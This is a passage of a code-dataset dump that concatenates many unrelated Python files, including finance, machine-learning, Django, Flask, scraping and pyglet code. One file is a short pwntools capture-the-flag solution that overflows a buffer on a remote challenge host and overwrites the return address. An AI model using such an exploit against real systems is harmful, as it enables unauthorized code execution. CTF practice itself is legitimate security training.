portfolio.Name())\n \n return query\n\n\ndef _CalculateOvernightSpreadValStart(query, date):\n \"\"\"\n Calculate the total value of Overnight Spread ValStart for the previous banking day. 
This will be\n used to decide on the spread to be used in the overnight funding.\n \"\"\"\n previous_banking_day = CALENDAR.AdjustBankingDays(date, -1)\n total_val_start = 0\n instrument_val_starts = PS_FundingSweeper.TradingManagerSweeper(query, previous_banking_day,\n ['Overnight Spread ValStart'], True)\n for ins, valStartList in instrument_val_starts.items():\n val_start = valStartList[0]\n total_val_start += val_start\n return total_val_start\n\n\ndef ExtendPortfolioSwap(portfolioSwap, resweepTPL, startDate, endDate):\n \"\"\"Run all the modules needed to extend a portfolio swap for each date between startDate and endDate inclusive.\"\"\"\n report_data = {}\n portfolio = portfolioSwap.FundPortfolio()\n for date in DateGenerator(startDate, endDate):\n PS_TimeSeriesFunctions.UpdateTimeSeries('PSExtExecPremRate', 'PSExtExecPremRate', portfolio, date)\n PS_TimeSeriesFunctions.UpdateTimeSeries('PSExtExecPremNonDMA', 'PSExtExecPremNonDMA', portfolio, date)\n PS_TimeSeriesFunctions.UpdateTimeSeries('PSShortPremRate', 'PSShortPremRate', portfolioSwap, date)\n funding = PS_FundingSweeper.GenerateFunding(portfolioSwap, date)\n provision = PS_FundingSweeper.GenerateProvision(portfolioSwap, date)\n\n # In general we don't want to overwrite the historical TPL resets, unless explicitly choosing to do so.\n tpl = {}\n if date == TODAY or resweepTPL:\n tpl = PS_FundingSweeper.GenerateTotalTPL(portfolioSwap, date)\n report_data[date] = (funding, provision, tpl)\n\n return report_data\n","sub_path":"Python modules/PS_ExtendPortfolioSwap.py","file_name":"PS_ExtendPortfolioSwap.py","file_ext":"py","file_size_in_byte":9358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"240046318","text":"'''\r\nCreated on Jun 4, 2012\r\n\r\n@author: Nich\r\n'''\r\n\r\ndirs = {\r\n \"e\" : (1, 0),\r\n \"w\" : (-1, 0),\r\n \"d\" : (0, -1),\r\n \"u\" : (0, 1),\r\n }\r\n\r\ndef add_dirs(*dirs):\r\n res = [0, 0]\r\n for d in dirs:\r\n for i, val in enumerate(d):\r\n res[i] = res[i]+val\r\n return tuple(res)","sub_path":"src/MessagePassingMud/map/directions.py","file_name":"directions.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"57643056","text":"import numpy as np\r\n\r\nclass Perceptron(object):\r\n\r\n def __init__(self, inputs, bias, maxIter = 1000, rate = 1):\r\n self.maxIter = maxIter\r\n self.rate = rate\r\n self.weights = np.array(inputs)\r\n self.bias = bias\r\n\r\n def predict(self, inputs):\r\n output = np.dot(inputs, self.weights) + self.bias\r\n if output >= 0:\r\n activation = 1\r\n else:\r\n activation = 0\r\n return activation\r\n\r\n def train(self, train_inputs, labels):\r\n for _ in range(self.maxIter):\r\n for inputs, label in zip(train_inputs, labels):\r\n prediction = self.predict(inputs)\r\n # np.add(self.weights, self.rate * (label - prediction) * inputs, out = self.weights, casting = \"unsafe\")\r\n self.weights = self.weights + self.rate * (label - prediction) * inputs\r\n self.bias = self.bias + self.rate * (label - prediction)\r\n # print(self.weights, self.bias)\r\n # print(self.weights, self.bias)","sub_path":"Perceptron Algorithm/New_Perceptron.py","file_name":"New_Perceptron.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"3052221","text":"#!/usr/bin/env python3\nfrom pwn import *\nimport pwnlib.shellcraft\nimport pwnlib\nimport 
time\n\npwn_file = \"./helloctf\"\nelf = ELF(pwn_file)\ncontext.os='linux'\ncontext.arch = 'amd64'\ncontext.terminal = ['tmux', 'splitw', '-h']\n\ncontext.log_level = 100\ncontext.log_level = 'debug'\n\nc = process(pwn_file)\ndbg_script = \"\"\"\n\"\"\"\n#gdb.attach(c,dbg_script)\nc = remote('ctf.adl.tw', '11001')\nc.sendlineafter('CTF', b'A' * (16 + 8) + p64(0x4006c7))\nc.interactive()\nc.close()\n","sub_path":"ctf.adl.tw-2020/helloctf.py","file_name":"helloctf.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"434145406","text":"from bs4 import BeautifulSoup\nimport requests\n\n\ndef get_soup(target):\n response = requests.get(url=target)\n return BeautifulSoup(response.content, 'html.parser')\n\n\ndef form_wiki_href_from_slug(slug):\n if slug[0:3] == \"/w/\" or len(slug) == 0:\n return None\n return \"https://en.wikipedia.org\" + slug\n\n\ndef get_clean_ele_text(ele):\n return ele.text.strip()\n\n\ndef get_current_events_from_soup(soup, day, year, destination):\n wiki_current_itn = soup.find(\n \"div\", {\"aria-labelledby\": \"Topics_in_the_news\"})\n\n wiki_current_itn_featured = wiki_current_itn.find('ul').find_all('li')\n\n destination['featured'] = []\n\n for ele in wiki_current_itn_featured:\n news = {}\n link = ele.find('b').find('a')\n news['title'] = link['title']\n news['href'] = form_wiki_href_from_slug(link['href'])\n destination['featured'].append(news)\n\n wiki_current_ongoing = soup.find(\n \"div\", {\"aria-labelledby\": \"Ongoing_events\"})\n\n ongoing_categories_headers = wiki_current_ongoing.find_all(\"h3\")\n ongoing_categories_lists = wiki_current_ongoing.find_all(\"ul\")\n\n for i, category_header in enumerate(ongoing_categories_headers):\n category = get_clean_ele_text(category_header).lower()\n destination[category] = []\n\n for li in ongoing_categories_lists[i].find_all('li'):\n news = {}\n link = li.find('a')\n news['title'] = link['title']\n news['href'] = form_wiki_href_from_slug(link['href'])\n destination[category].append(news)\n\n scrape_target = \"https://en.wikipedia.org/wiki/Deaths_in_%s\" % (year)\n soup = get_soup(scrape_target)\n\n wiki_recent_deaths_day_header = soup.find('h3')\n\n header_int = int(wiki_recent_deaths_day_header.text)\n\n if header_int > int(day):\n wiki_recent_deaths_day_header = soup.find('h3').find_next_sibling(\n 'h3')\n\n wiki_recent_deaths = wiki_recent_deaths_day_header.find_next_sibling(\n 'ul').find_all('li')\n\n destination['deaths'] = []\n\n for li in wiki_recent_deaths:\n news = {}\n link = li.find('a')\n news['title'] = link['title']\n href = form_wiki_href_from_slug(link['href'])\n\n if href:\n news['href'] = href\n\n destination['deaths'].append(news)\n\n return\n","sub_path":"main/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"345812111","text":"\n\nfrom xai.brain.wordbase.nouns._petard import _PETARD\n\n#calss header\nclass _PETARDS(_PETARD, ):\n\tdef __init__(self,): \n\t\t_PETARD.__init__(self)\n\t\tself.name = \"PETARDS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"petard\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_petards.py","file_name":"_petards.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"9541614","text":"import numpy as np\nimport tensorflow as 
tf\n\n\n#Restore\n\nwinput = tf.Variable(np.arange(10).reshape(1,10),dtype=tf.float32, name = \"Layer1_Weights\")\nbinput = tf.Variable(np.arange(10).reshape(1,10),dtype = tf.float32, name = \"Layer1_Bias\")\nwoutput = tf.Variable(np.arange(10).reshape(10,1),dtype=tf.float32, name = \"OutPut_Weights\")\nboutput = tf.Variable(np.arange(1).reshape(1,1),dtype = tf.float32, name = \"OutPut_Bias\")\nsaver = tf.train.Saver()\nsess = tf.Session()\nsaver.restore(sess,\"my_net/save_net.ckpt\")\nprint(\"winput\", sess.run(winput))\nprint(\"binput\", sess.run(binput))\nprint(\"woutput\", sess.run(woutput))\nprint(\"boutput\", sess.run(boutput))","sub_path":"myprictice/python/tf/RestoreFbp.py","file_name":"RestoreFbp.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"298142044","text":"'''\nCreated on Oct 30, 2018\n\n@author: daniel\n'''\n\nfrom keras.models import Model, Input\nfrom keras.layers import Convolution2D, Activation, BatchNormalization,MaxPooling2D, Convolution2DTranspose, Dropout, concatenate\nfrom Mylayers import MaxPoolingWithArgmax2D, MaxUnpooling2D\n\ndef inceptionModule(inputs, numFilters = 32):\n \n tower_0 = Convolution2D(numFilters, (1,1), padding='same', kernel_initializer = 'he_normal')(inputs)\n tower_0 = BatchNormalization()(tower_0)\n tower_0 = Activation(\"relu\")(tower_0)\n \n tower_1 = Convolution2D(numFilters, (1,1), padding='same',kernel_initializer = 'he_normal')(inputs)\n tower_1 = BatchNormalization()(tower_1)\n tower_1 = Activation(\"relu\")(tower_1)\n tower_1 = Convolution2D(numFilters, (3,3), padding='same',kernel_initializer = 'he_normal')(tower_1)\n tower_1 = BatchNormalization()(tower_1)\n tower_1 = Activation(\"relu\")(tower_1)\n \n tower_2 = Convolution2D(numFilters, (1,1), padding='same',kernel_initializer = 'he_normal')(inputs)\n tower_2 = BatchNormalization()(tower_2)\n tower_2 = Activation(\"relu\")(tower_2)\n tower_2 = Convolution2D(numFilters, (3,3), padding='same',kernel_initializer = 'he_normal')(tower_2)\n tower_2 = BatchNormalization()(tower_2)\n tower_2 = Activation(\"relu\")(tower_2)\n \n tower_3 = MaxPooling2D((3,3), strides=(1,1), padding='same')(inputs)\n tower_3 = Convolution2D(numFilters, (1,1), padding='same',kernel_initializer = 'he_normal')(tower_3)\n tower_3 = BatchNormalization()(tower_3)\n tower_3 = Activation(\"relu\")(tower_3)\n \n inception_module = concatenate([tower_0, tower_1, tower_2, tower_3], axis = 3)\n return inception_module\n \ndef createUNetInceptionIndexPooling(input_shape = (240,240,1), output_mode=\"sigmoid\", pool_size=(2,2)):\n inputs = Input(input_shape)\n \n numFilters = 16;\n \n conv1 = inceptionModule(inputs, numFilters)\n pool1, mask1 = MaxPoolingWithArgmax2D(pool_size)(conv1)\n \n conv2 = inceptionModule(pool1, 2*numFilters)\n pool2, mask2 = MaxPoolingWithArgmax2D(pool_size)(conv2)\n \n conv3 = inceptionModule(pool2, 4*numFilters)\n drop3 = Dropout(0.5)(conv3)\n pool3, mask3 = MaxPoolingWithArgmax2D(pool_size)(drop3)\n\n conv4 = inceptionModule(pool3, 8*numFilters)\n drop4 = Dropout(0.5)(conv4)\n pool4, mask4 = MaxPoolingWithArgmax2D(pool_size)(drop4)\n \n up6 = MaxUnpooling2D(pool_size)([pool4, mask4])\n merge6 = concatenate([conv4,up6],axis=3)\n conv6 = inceptionModule(merge6, 4*numFilters)\n \n up7 = MaxUnpooling2D(pool_size)([conv6, mask3])\n merge7 =concatenate([conv3,up7],axis=3)\n conv7 = inceptionModule(merge7, 2*numFilters)\n \n up8 = MaxUnpooling2D(pool_size)([conv7, mask2])\n merge8 
=concatenate([conv2,up8],axis=3)\n conv8 = inceptionModule(merge8,numFilters)\n \n up9 = MaxUnpooling2D(pool_size)([conv8, mask1])\n merge9 =concatenate([conv1,up9],axis=3)\n conv9 = inceptionModule(merge9, numFilters)\n \n conv9 = Convolution2D(numFilters, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(conv9)\n conv9 = Convolution2D(1, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(conv9)\n conv10 = Convolution2D(1, 1, activation = output_mode)(conv9)\n\n model = Model(input = inputs, output = conv10)\n\n #model.compile(optimizer = Adam(lr = 1e-4), loss = 'binary_crossentropy', metrics = ['accuracy'])\n \n #model.summary()\n\n return model","sub_path":"UNetFactory/createUNetInceptionIndexPooling.py","file_name":"createUNetInceptionIndexPooling.py","file_ext":"py","file_size_in_byte":3462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"648240499","text":"from setuptools import setup, find_packages\n\n\ndef read_file(name):\n with open(name) as fobj:\n return fobj.read().strip()\n\n\nLONG_DESCRIPTION = read_file(\"README.md\")\nVERSION = read_file(\"Ctl/VERSION\")\n\nsetup(\n name=\"django-ixpmgr\",\n version=VERSION,\n author=\"20C\",\n author_email=\"code@20c.com\",\n description=\"django overlay for IXP-Manager\",\n long_description=LONG_DESCRIPTION,\n long_description_content_type=\"text/markdown\",\n license=\"LICENSE.txt\",\n classifiers=[\n \"Development Status :: 3 - Alpha\",\n \"Intended Audience :: Developers\",\n \"License :: OSI Approved :: Apache Software License\",\n \"Programming Language :: Python :: 3.6\",\n \"Programming Language :: Python :: 3.7\",\n \"Programming Language :: Python :: 3.8\",\n \"Topic :: Internet\",\n \"Topic :: Software Development :: Libraries :: Python Modules\",\n ],\n packages=find_packages(\"src\"),\n package_dir={\"\": \"src\"},\n include_package_data=True,\n url=\"https://github.com/20c/django-ixpmgr\",\n download_url=f\"https://github.com/20c/django-ixpmgr/archive/{VERSION}.zip\",\n install_requires=[\"semver==2.10.2\"],\n zip_safe=False,\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"2176926","text":"from django.shortcuts import render , HttpResponse , redirect\nfrom django.http import JsonResponse\nfrom datetime import datetime\nfrom .models import Book , Profile , Comment , Rating\nfrom .forms import BookForm, UserForm , Profile , CommentForm, RegisterForm, ProfileForm , SettingForm , PasswordChangeingForm\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import User\nfrom django.core.mail import send_mail, BadHeaderError\nfrom django.contrib.auth.forms import PasswordResetForm , PasswordChangeForm\nfrom django.contrib.auth.views import PasswordChangeView\nfrom django.template.loader import render_to_string\nfrom django.db.models.query_utils import Q\nfrom django.utils.http import urlsafe_base64_encode\nfrom django.contrib.auth.tokens import default_token_generator\nfrom django.utils.encoding import force_bytes\nfrom django.contrib import messages\nfrom django.urls import path ,reverse_lazy, include\n\n\n# Create your views here.\n\n# Get to HOME page\ndef home(request):\n # book= Book.objects.all()\n return render(request, 'home.html')\n\ndef signin(request):\n return render(request,\"user/signin.html\")\n\ndef 
search_by_type(request,mtype):\n book= Book.objects.filter(book_type=mtype)\n return render(request, 'book/searchbytype.html', {'books': book} ) \n\n\n#profile\ndef profile(request,pk): \n profile = Profile.objects.get(pk=pk)\n\n return render(request , 'profile/profile_show.html',{'profile':profile} )\n\ndef Profile_edit(request,pk):\n profile_edit = Profile.objects.get(pk=pk)\n if request.method == \"POST\":\n form = ProfileForm(request.POST, instance=profile_edit)\n if form.is_valid():\n profile_edit = form.save()\n messages.add_message(request , messages.SUCCESS , \"Update profile successfully\")\n return redirect('profile', pk=profile_edit.pk)\n else:\n form = ProfileForm(instance=profile_edit)\n return render(request, 'profile/profile_edit.html', {'form': form})\n\n\n\n\n# ------------------------------ book route ----------------------------\n# To display all the books\ndef books(request):\n all_books = Book.objects.all()\n horrorBook= Book.objects.filter(book_type=\"horror\")\n actionBook= Book.objects.filter(book_type=\"action\")\n return render(request , 'book/index.html', {\"all_books\" : all_books, 'horrorBook': horrorBook, 'actionBook': actionBook})\n\n# To view a selector book\ndef view_book(request, pk):\n \n total= 0\n count1=0\n count2=0\n count3=0\n count4=0\n count5=0\n id_ = pk\n rate= Rating.objects.filter(book=pk)\n if rate.count() == 0:\n total=1\n else: \n total=rate.count()\n for rete in rate:\n if rete.score == 1:\n count1 += 1\n if rete.score == 2:\n count2 += 1\n if rete.score == 3:\n count3 += 1\n if rete.score == 4:\n count4 += 1\n if rete.score == 5:\n count5 += 1\n # count1=count1/total*100\n # count2=count2/total*100\n # count3=count3/total*100\n # count4=count4/total*100\n # count5=count5/total*100\n try:\n one_book = Book.objects.get(pk=pk)\n except Exception:\n return HttpResponse(\"error\")\n\n return render(request , 'book/view.html', {\"book\" : one_book, \"count1\" : count1, \"count2\" : count2, \"count3\" : count3 , \"count4\" : count4, \"count5\" : count5})\n\n\ndef show_books(request):\n book= Book.objects.all()\n \n return render(request, 'home.html', {'all_book': book} ) \n\n# To add a new book\n@login_required()\ndef add_book(request):\n if request.method == 'POST':\n form = BookForm(request.POST)\n if form.is_valid():\n form.save()\n messages.add_message(request , messages.SUCCESS , \"Update book successfully\")\n return redirect('/book/')\n else:\n if request.user.profile.user_status:\n form = BookForm()\n return render(request , 'book/book_form.html', {'form': form})\n else:\n return redirect('/home/')\n\n# To Update the book\n@login_required()\ndef edit_book(request,pk):\n edit_book= Book.objects.get(pk=pk)\n form = BookForm(instance=edit_book)\n if (request.method == \"POST\"):\n Edit_book =BookForm(request.POST,instance=edit_book) \n if Edit_book.is_valid() :\n Edit_book.save()\n messages.add_message(request , messages.SUCCESS , \"Added book successfully\")\n return redirect (f'/book/{pk}')\n return render(request , 'book/book_form.html' , {\"form\" : form})\n\n# To Delete the book\n@login_required()\ndef delete_book(request , pk):\n book = Book.objects.get(pk=pk)\n book.delete()\n messages.add_message(request , messages.SUCCESS , \"Deleted book successfully\")\n return redirect('/book/')\n\n# Add a book to a favoriate list\n@login_required()\ndef favorite_book(request , pk):\n user = User.objects.get(pk = request.user.id)\n book = Book.objects.get(pk=pk)\n print(user.profile.fav_books.all)\n if book in user.profile.fav_books.all():\n 
user.profile.fav_books.remove(book)\n else:\n user.profile.fav_books.add(book)\n\n request.user = user\n print( user.profile.fav_books.all())\n return redirect(f'/book/{pk}/')\n\n# Add a book to a wantToRead\n@login_required()\ndef wantToRead(request , pk):\n user = User.objects.get(pk = request.user.id)\n book = Book.objects.get(pk=pk)\n if book in user.profile.wantToRead.all():\n user.profile.wantToRead.remove(book)\n else:\n user.profile.wantToRead.add(book)\n request.user = user\n print( user.profile.wantToRead.all())\n return redirect(f'/book/{pk}/')\n \n#----------------------- Auth ----------------------------------\ndef singin(request):\n messages.add_message(request , messages.SUCCESS , \"Login successfully\")\n return render(request,\"user/singin.html\")\n\ndef register(request):\n form = RegisterForm()\n if( request.method == \"POST\"):\n user = RegisterForm(request.POST)\n if(user.is_valid()):\n user.save()\n messages.add_message(request , messages.SUCCESS , \"Register successfully\")\n return redirect('/home/')\n else:\n form = user\n messages.add_message(request, messages.ERROR, 'Register failure')\n return render(request, \"user/register.html\", { \"form\": form })\n\n\nclass PasswordChangeView(PasswordChangeView):\n from_class= PasswordChangeingForm\n success_url=reverse_lazy('password_change_success')\n\ndef PasswordChangeDone(request):\n return render(request,\"auth/password_change_done.html\")\n\n#----------------------- profile ----------------------------------\n#show profile \ndef profile(request,pk): \n profile = Profile.objects.get(pk=pk)\n\n return render(request , 'profile/profile_show.html',{'profile':profile} )\n\n#Edit profile \n@login_required()\ndef Profile_edit(request,pk):\n profile_edit = Profile.objects.get(pk=pk)\n if request.method == \"POST\":\n form = ProfileForm(request.POST, request.FILES,instance=profile_edit)\n if form.is_valid():\n profile_edit = form.save()\n messages.add_message(request , messages.SUCCESS , \"Update profile successfully\")\n return redirect('profile', pk=profile_edit.pk)\n else:\n form = ProfileForm(instance=profile_edit)\n return render(request, 'profile/profile_edit.html', {'form': form})\n\n\n\n\n@login_required()\ndef Setting(request,pk):\n if request.method == \"POST\":\n form = SettingForm(request.POST, instance=request.user)\n if form.is_valid():\n profile_Setting = form.save()\n return redirect('profile', pk=request.user.id)\n else:\n form = SettingForm(instance=request.user)\n return render(request, 'profile/setting.html', {'form': form})\n\n# To add a new cooment\n@login_required()\ndef add_comment(request,pk):\n book1=Book.objects.get(pk=pk)\n if request.method == 'POST':\n form = CommentForm(request.POST, request.user)\n if form.is_valid():\n comment = form.save(commit=False)\n comment = Comment.objects.create(\n user =request.user,\n name=comment.name,\n comment=comment.comment,\n )\n comment.book.add(book1)\n comment.save()\n return redirect(f'/book/{pk}/')\n else:\n form = CommentForm()\n \"\"\" messages.add_message(request, messages.WARNING, \"Failed to add your comment\") \"\"\"\n\n return render(request , 'comment/add_comment.html', {'form': form})\n\n#To edit the comment\n@login_required()\ndef edit_comment(request,pk,pkb):\n edit_comment= Comment.objects.get(pk=pk)\n if edit_comment.user == request.user:\n form = CommentForm(instance=edit_comment)\n if (request.method == \"POST\"):\n Edit_comment =CommentForm(request.POST,instance=edit_comment) \n if Edit_comment.is_valid() :\n Edit_comment.save()\n return 
redirect (f'/book/{pkb}')\n else:\n return render(request , 'comment/add_comment.html' , {\"form\" : form})\n else: \n html = \"

you can't do it

\" \n return HttpResponse(html)\n\n# To Delete the comment\n@login_required()\ndef delete_comment(request , pk):\n comment = Comment.objects.get(pk=pk)\n if comment.user == request.user:\n comment.delete()\n messages.add_message(request , messages.SUCCESS , \"The comment deleted successfully\")\n return redirect('home')\n else: \n messages.add_message(request, messages.WARNING, \"Failed to add your comment\")\n\n\ndef Search(request):\n book= Book.objects.all()\n query = request.GET.get(\"q\")\n if query:\n book = Book.objects.filter(Q(name__icontains=query) )\n\n return render(request,'book/Search.html',{'all_books': book})\n\n# To add a new reting for a book\n@login_required()\ndef add_rate(request,pk):\n book1=Book.objects.get(pk=pk)\n val = request.POST['rate']\n print (\"rate : \"+request.POST['rate'])\n print (\"----------------------------\")\n print ( request.user)\n\n if request.method == 'POST':\n rate = Rating.objects.create(\n user =request.user,\n book=book1,\n score = request.POST['rate']\n )\n rate.save()\n messages.add_message(request , messages.SUCCESS , \"Added your rating successfully\")\n return redirect(f'/book/{pk}/')\n messages.add_message(request , messages.WARNING,\"There is an error please try again\")\n return redirect(f'/book/{pk}/')\n\n\n","sub_path":"book/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"388900114","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('noccapp', '0004_auto_20150512_1242'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='patient',\n name='user',\n field=models.ForeignKey(verbose_name=b'utente', to=settings.AUTH_USER_MODEL, unique=True),\n ),\n ]\n","sub_path":"noccapp/migrations/0005_auto_20150512_1447.py","file_name":"0005_auto_20150512_1447.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"631381342","text":"# -*- encoding: utf-8 -*-\nimport logging\nimport unittest\nfrom mock import patch,MagicMock\nfrom src.controller.endpoint_handlers.base_endpoint_handler import \\\n BaseEndpointHandler\nfrom src.controller.logs.logger_factory import LoggerFactory\n\n\nclass TestBaseEndpointHandler(unittest.TestCase):\n\n def setUp(self ):\n logger = LoggerFactory.get_logger(\n # This path is set to be used with nosetests, so do not change.\n # Rather change the Pycharm launcher instead if needed and set it\n # to xxx\\ms-cloud\\python\\OutputHandlerNode\n \"./src/controller/logs/processing_node.log\", logging.INFO\n )\n #We disable the stream logger so exceptions do not print\n logger.handlers = logger.handlers[:-1]\n self.handler = BaseEndpointHandler(None, logger)\n\n def tearDown(self ):\n pass\n\n def test_log_endpoint_reads_file(self):\n input = \"Test\\nstring\\nfor\\nlog\\nfile\"\n expected = \"Test
string
for
log
file\"\n\n m = self.get_mock_for_file_open(input, 28)\n with patch('__builtin__.open', m) as mock:\n result = self.handler.handle_log_get()\n self.assertEquals(expected, result)\n\n def get_mock_for_file_open(self, file_text, file_bytes):\n mock = MagicMock(spec=file)\n handle = MagicMock(spec=file)\n handle.write.return_value = None\n handle.read.return_value = file_text\n handle.tell.return_value = file_bytes\n handle.__enter__.return_value = handle\n \"\"\"\n This is the tricky part. You have to specified a return_value to the\n mock intself. This way, when the test_subject calls open() the handle\n mock will be returned.\n\n If you do not assign a return_value to mock, then a random new mock\n will be returned to the test subject, which will have no values set\n for read() or tell().\n \"\"\"\n mock.return_value = handle\n return mock\n\nif __name__ == '__main__':\n unittest.main()","sub_path":"test/test_base_endpoint_handler.py","file_name":"test_base_endpoint_handler.py","file_ext":"py","file_size_in_byte":2017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"83952569","text":"from django.shortcuts import render\nfrom django.views.generic import View\nfrom django.http import HttpResponse\nfrom django.contrib.auth import authenticate,login\n\nfrom .forms import UserAskForm\nfrom .models import UserAsk\n\n# Create your views here.\n\nclass ContentView(View):\n def get(self, request):\n return render(request, \"contact.html\")\n\n\ndef AskForm(request):\n if request.method == \"POST\":\n send_form = UserAskForm(request.POST) # 实例化 \\ 初始化form\n if send_form.is_valid(): # 验证是否合法(即是否满足forms.py的设置)\n msg = request.POST.get(\"msg\", \"\") # 取出 user_name 和 pass_word\n name = request.POST.get(\"name\", \"\")\n if UserAsk.objects.filter(msg=msg,name=name): # 判断 用户是否存在(如果存在)\n return render(request, \"contact.html\", {\"register_form\": send_form,\n \"msg\": \"请勿重复提交!\"}) # 即 这个 email已经被注册过,不存在就进行下面的操作,传回form回填信息,天使吧验证码保存\n name = request.POST.get(\"name\", \"\") # 取出 user_name\n email = request.POST.get(\"email\", \"\")\n mobile = request.POST.get(\"mobile\", \"\")\n zy = request.POST.get(\"zy\", \"\")\n msg = request.POST.get(\"msg\", \"\")\n content = authenticate(name=name,email=email,mobile=mobile,zy=zy,msg=msg)\n\n user_ask = UserAsk()\n user_ask.name = name\n user_ask.mobile = mobile\n user_ask.email = email\n user_ask.zy = zy\n user_ask.msg = msg\n user_ask.save()\n\n if content is not None:\n login(request,content)\n return render(request,\"contact.html\")\n else:\n return render(request,\"contact.html\",{\"msg\":\"添加信息出错\"})\n elif request.method ==\"GET\":\n return render(request,\"contact.html\")\n\n\n\n\n","sub_path":"apps/content/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"262644444","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jan 26 16:31:08 2020\n\n@author: charles\n\"\"\"\nimport time\nimport notify2\nfrom top_news import top_story_sender\n\n\ndef notification_sender():\n \n \n news_recevied = top_story_sender()\n \n notify2.init('notifier')#itializer for d bus\n \n n = notify2.Notification(None) #notification object\n \n n.set_urgency(notify2.URGENCY_NORMAL)\n \n n.set_timeout(10000)\n \n for news in news_recevied:\n n.update(news['title'],news['description'])\n \n n.show()\n \n time.sleep(15000)\n \n \n \n\nnotification_sender()\n\n \n \n \n\n 
\n","sub_path":"notifier.py","file_name":"notifier.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"427930848","text":"import pyglet\nfrom pyglet.window import key, mouse\n\n# set pyglet resource dir\nimage_path = \"../../assets/image\"\npyglet.resource.path = [image_path]\n\n# create window, text and image objects\nwindow = pyglet.window.Window()\nlabel = pyglet.text.Label(\n \"Hello world\",\n font_name=\"Times New Roman\",\n font_size=36,\n x=window.width//2, \n y=window.height//2,\n anchor_x=\"center\", \n anchor_y=\"center\"\n )\nimage = pyglet.resource.image(\"mini.jpg\")\n \n@window.event\ndef on_key_press(symbol, modifiers):\n if symbol == key.A:\n print(\"A\")\n\n if symbol == key.LEFT:\n print(\"LEFT\")\n \n if symbol == key.ENTER:\n print(\"ENTER\")\n\n@window.event\ndef on_mouse_press(x, y, button, modifiers):\n if button == mouse.LEFT:\n print(\"mouse left\")\n\n@window.event\ndef on_draw():\n window.clear()\n image.blit(0, 0)\n label.draw()\n\nif __name__ == \"__main__\":\n pyglet.app.run()\n","sub_path":"example/01-PygletApp/hello_world.py","file_name":"hello_world.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"286636257","text":"from flask import Flask\nfrom flask import redirect, url_for\n\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef index():\n return 'Hello World!'\n\n@app.route('/user/')\ndef Hello(username):\n if username == 'victor':\n return f'Hello {username}'\n #return redirect(url_for('index'))\n return redirect('/', 303)\n\n@app.route('/user/')\ndef user_index(username):\n return f'Hello {username}'\n\n@app.route('/post/')\ndef show_post(post_id):\n return f'Post {post_id}'\n\n@app.route('/test')\ndef test():\n print(url_for('index'))\n print(url_for('user_index', username='shiyan'))\n print(url_for('show_post', post_id=2, _external=True))\n print(url_for('show_post', post_id=2, q='python 03'))\n print(url_for('show_post', post_id=2, q='python你好'))\n print(url_for('show_post', post_id=2, _anchor='a'))\n return 'test'\n\n@app.route('/test')\ndef test():\n print('xxx.simplelab.cn/courses/java')\n return redirect('/', 301)\n","sub_path":"flask_code_learn/app_test.py","file_name":"app_test.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"576109641","text":"#! /usr/bin/env python3\n\nimport re\nimport subprocess\nimport os\n\n\ndef path(*path_segments):\n return os.path.join(os.getcwd(), *path_segments)\n\n\ndef open_file(*path_segments):\n file_path = path(*path_segments)\n open(file_path, 'w').close()\n return open(file_path, 'a')\n\ndef get_commands():\n setup_py = open('setup.py', 'r')\n lines = setup_py.read()\n return re.findall(r' {8,}\\'([a-z0-9-]*.py) = jfscripts.[a-z0-9_]*:main\\',',\n lines)\n\n\ndef get_help(command):\n return subprocess.Popen('{} --help'.format(command), shell=True,\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\n\ndef heading(text):\n return '\\n{}\\n{}\\n\\n.. 
